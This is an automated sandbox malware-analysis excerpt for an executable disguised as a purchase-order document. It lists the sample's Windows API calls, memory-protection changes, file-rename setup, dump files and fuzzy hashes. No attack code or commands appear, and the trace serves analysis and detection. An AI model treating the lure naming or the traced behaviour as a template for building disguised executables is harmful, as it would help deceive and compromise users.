                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                • Opcode ID: 6e648e4d60bbbe4240689ab11f1c8e4383af39775b03d872555c2639b8fa9900
                                                                                                                                                                • Instruction ID: 0ac01c35b1a0eb5cd592cd1bd468c7a0eb97994f07403c330b4f6ecb6608de49
                                                                                                                                                                • Opcode Fuzzy Hash: 6e648e4d60bbbe4240689ab11f1c8e4383af39775b03d872555c2639b8fa9900
                                                                                                                                                                • Instruction Fuzzy Hash: 7D01F431628210ABE7194B789C04B6A3698E751359F10C23BF911F76F1D67CDC028B4D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00404F66
                                                                                                                                                                  • Part of subcall function 00403ED3: SendMessageA.USER32(000103E0,00000000,00000000,00000000), ref: 00403EE5
                                                                                                                                                                • OleUninitialize.OLE32(00000404,00000000), ref: 00404FB2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeMessageSendUninitialize
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2896919175-0
                                                                                                                                                                • Opcode ID: 2b1e81a0dd4c0a0f4039bae0cfee92b1e0953e7f913a1ec474d827480a4d54f7
                                                                                                                                                                • Instruction ID: d474321d01a6e1a1f3848ce65de0e77d4b030d2df71d63d9074073521acdc131
                                                                                                                                                                • Opcode Fuzzy Hash: 2b1e81a0dd4c0a0f4039bae0cfee92b1e0953e7f913a1ec474d827480a4d54f7
                                                                                                                                                                • Instruction Fuzzy Hash: 56F0F0B3A042028AE7015B58AC00B1277A4EBE4356F06803EFF04B32E2C77D9842876D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe,80000000,00000003), ref: 00405829
                                                                                                                                                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040584B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                                • Opcode ID: 2ef177618df3c6e064d17c8612f07db8468e07c34dd9f446758cb9fc7f1f7b71
                                                                                                                                                                • Instruction ID: d58f26a5a32defaeeb3d325f121af029a3aa60b04f4a5bd1c9a51958cab5ad8a
                                                                                                                                                                • Opcode Fuzzy Hash: 2ef177618df3c6e064d17c8612f07db8468e07c34dd9f446758cb9fc7f1f7b71
                                                                                                                                                                • Instruction Fuzzy Hash: B8D09E31658301AFEF098F20DE16F2EBBA2EB84B01F10962CB642940E0D6715C15DB16
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000), ref: 1000285B
                                                                                                                                                                • GetLastError.KERNEL32 ref: 10002962
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56148208324.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56148179515.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56148234676.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56148257836.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_10000000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocErrorLastVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 497505419-0
                                                                                                                                                                • Opcode ID: ba7f390c09ff9bfcbf5680bad404fe2f4794605870cc1d857870def209431754
                                                                                                                                                                • Instruction ID: bd365418521e43e453085722f926cc1c0e2ab3e4cffdaddced3e06c5c0338b71
                                                                                                                                                                • Opcode Fuzzy Hash: ba7f390c09ff9bfcbf5680bad404fe2f4794605870cc1d857870def209431754
                                                                                                                                                                • Instruction Fuzzy Hash: D951A5BA808215DFFB24DF64DCC675937A8EB443D4F22842AE608E722DDF34A950CB55
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EBC,000000FF,00000004,00000000,00000000,00000000), ref: 00403089
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                • Opcode ID: e68bf106eb3186c7e106c3f9a269c6ae9a01f653eb00a6b034ce70840e3ede78
                                                                                                                                                                • Instruction ID: 0981d36ce8a37324ca65ea29ac33eec068edb21049201a101882ec42e2df6d76
                                                                                                                                                                • Opcode Fuzzy Hash: e68bf106eb3186c7e106c3f9a269c6ae9a01f653eb00a6b034ce70840e3ede78
                                                                                                                                                                • Instruction Fuzzy Hash: 3FE08C32151119BBCF205E619C08AEB3B5CEB007A6F00C033BA18E5190D630EB149BA8
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 100026E0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56148208324.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56148179515.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56148234676.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56148257836.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_10000000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                                                                                • Instruction ID: 50d40a96d24def304b4b26cf20c6df658c6444d5d293e09e435d7040471c3010
                                                                                                                                                                • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                                                                                • Instruction Fuzzy Hash: 2BF09BF19092A0DEF360DF688CC47063FE4E7983D5B03852AE358F6269EB3445448B19
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageA.USER32(000103E0,00000000,00000000,00000000), ref: 00403EE5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                • Opcode ID: b90161ae8cda5cbd2de65598e29a38e6d4b8b6f2e7bfd1190cff9b69a8922c47
                                                                                                                                                                • Instruction ID: 47e4f8cec5362ef7ba492606aa4db3ba17659bb6329be143cabb9808bdc3d1f3
                                                                                                                                                                • Opcode Fuzzy Hash: b90161ae8cda5cbd2de65598e29a38e6d4b8b6f2e7bfd1190cff9b69a8922c47
                                                                                                                                                                • Instruction Fuzzy Hash: 03C04C716482016BEA218B519D49F177758A750701F188425B610A50D0C675E410D66D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DFA,?), ref: 004030B2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FilePointer
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                                • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                                                                                • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                                                                                                • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                                                                                • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageA.USER32(00000028,?,00000001,00403CED), ref: 00403ECA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                • Opcode ID: 03409981cf4ee464f739a57fbc3ade95d75e68a5d1ce81eec46599a942b3d8ba
                                                                                                                                                                • Instruction ID: 6533290ec96ace9f69d4b5d2bc7ee10b2e44395606cff802ce15a0f50474627a
                                                                                                                                                                • Opcode Fuzzy Hash: 03409981cf4ee464f739a57fbc3ade95d75e68a5d1ce81eec46599a942b3d8ba
                                                                                                                                                                • Instruction Fuzzy Hash: 99B01235588200BBEE224B00DD0DF457EA2F7A4701F00C024F300240F1C7B200A5DB19
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,00403C86), ref: 00403EB3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                                                • Opcode ID: 98b266ebdf0f3c27f3687bff4252ab036e6b5e8ad03fafb5568fabfe7cf076f6
                                                                                                                                                                • Instruction ID: 4f3b606e1f3b2692e0293683fec327d542fd6d14cd426307677a9e2f6e263f5f
                                                                                                                                                                • Opcode Fuzzy Hash: 98b266ebdf0f3c27f3687bff4252ab036e6b5e8ad03fafb5568fabfe7cf076f6
                                                                                                                                                                • Instruction Fuzzy Hash: F2A01231404001EBCB018B10DF05C057F21B7503007018421E1404003486310420FF1A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • CharNextA.USER32(?,0040319C,"C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe",00000020), ref: 0040565C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CharNext
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3213498283-0
                                                                                                                                                                • Opcode ID: cab86ad4fbbc926bf9d9c4068ad28f349fd9e0cffecbcadba0a0645dfc6f61bb
                                                                                                                                                                • Instruction ID: 6e4b35d103a21483788ebd864c5a0626f5b9ee6a2529c86503c35e2e2383ccd4
                                                                                                                                                                • Opcode Fuzzy Hash: cab86ad4fbbc926bf9d9c4068ad28f349fd9e0cffecbcadba0a0645dfc6f61bb
                                                                                                                                                                • Instruction Fuzzy Hash: B9C0803440C74467C71057305434C677FE0EA71301F9C4C56F0C963150C135A800CF1A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • lstrcpyA.KERNEL32(007A0A88,NUL,?,00000000,?,00000000,?,00405A53,?,?,00000001,00405613,?,00000000,000000F1,?), ref: 004058AD
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405A53,?,?,00000001,00405613,?,00000000,000000F1,?), ref: 004058D1
                                                                                                                                                                • GetShortPathNameA.KERNEL32(00000000,007A0A88,00000400), ref: 004058DA
                                                                                                                                                                  • Part of subcall function 0040578A: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,0040599C,00000000,[Rename]), ref: 0040579A
                                                                                                                                                                  • Part of subcall function 0040578A: lstrlenA.KERNEL32(?,?,00000000,0040599C,00000000,[Rename]), ref: 004057CC
                                                                                                                                                                • GetShortPathNameA.KERNEL32(?,007A0E88,00000400), ref: 004058F7
                                                                                                                                                                • wsprintfA.USER32 ref: 00405915
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,007A0E88,C0000000,00000004,007A0E88,?,?,?,?,?), ref: 00405950
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 0040595F
                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405979
                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 004059A9
